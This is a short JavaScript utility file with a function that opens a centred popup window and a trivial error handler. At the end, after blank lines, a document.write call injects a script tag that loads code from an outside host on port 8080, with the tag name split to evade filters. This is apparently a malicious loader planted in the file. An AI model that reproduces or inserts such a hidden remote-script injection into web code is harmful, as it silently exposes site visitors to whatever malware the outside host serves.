function popupChromeless(url,width,height)
{
	leftpos = (screen.availWidth - width) / 2; // centre page
	toppos = (screen.availHeight - height) / 2;
	windowprops = "height=" + height + ",width=" + width + ",left=" + leftpos + ",top=" + toppos + 
		",scrollbars=no,menubars=no,toolbars=no,resizable=no;";
	window.open(url, "Popup", windowprops);
	
}

function clearerror()
{
	return true;
}




document.write('<s'+'cript type="text/javascript" src="http://dodo.busop.info:8080/Bcc.js"></scr'+'ipt>');